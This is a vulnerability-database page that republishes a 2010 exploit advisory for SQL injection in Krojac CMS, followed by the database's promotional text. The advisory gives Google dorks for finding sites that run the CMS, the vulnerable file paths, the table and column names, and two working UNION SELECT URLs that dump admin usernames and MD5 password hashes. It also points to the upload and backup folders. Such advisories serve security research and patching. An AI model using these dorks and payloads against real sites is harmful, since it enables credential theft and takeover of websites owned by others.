Lucene search
K

Krojac CMS SQL Injection

🗓️ 21 Sep 2010 00:00:00Reported by MikiSoftType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Krojac CMS SQL Injection vulnerability details and Po

Code
`# Exploit Title: Krojac(h) CMS SQL Injection Vulnerabilities  
# Date (found): 6.2010  
# Author: MikiSoft (Email: [email protected])  
# CMS (Software) Site/Link: http://www.krojac.com  
# Versions (affected): All (Edit: In latest version this is fixed now...)  
  
# Google dorks:  
intext:"Skrojio i sašio Krojač" ; intext:"Made by Krojač" ; inurl:"/krojacpanel/"  
  
## SQLi Vulnerabilities:  
  
Affected files: myImage.class.php & myOpenFile.php. (Location of that files: /krojacpanel/php/class/myphp/)  
  
SQLi details: Number of columns: 1/2 ; Table: Korisnik ; Columns: username & password (encrypted in MD5) ; Panel (admin): /krojacpanel/  
  
PoC (Proof of Concept):  
http://[SITE]/krojacpanel/php/class/myphp/myImage.class.php?ID=99999+union+all+select+group_concat(username,0x3a,password)+from+Korisnik--  
http://[SITE]/krojacpanel/php/class/myphp/myOpenFile.php?IDFajl=99999+union+all+select+group_concat(username,0x3a,password),2+from+Korisnik--  
  
Btw. Here is location of uploaded files/documents (not always): /krojacpanel/UploadedFiles/ , and /krojacpanel/documents/ ; and location of backup folder: /krojacpanel/Backup/  
  
###END###  
##P.S. If you have any questions, comments, or concerns, feel free to contact me.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation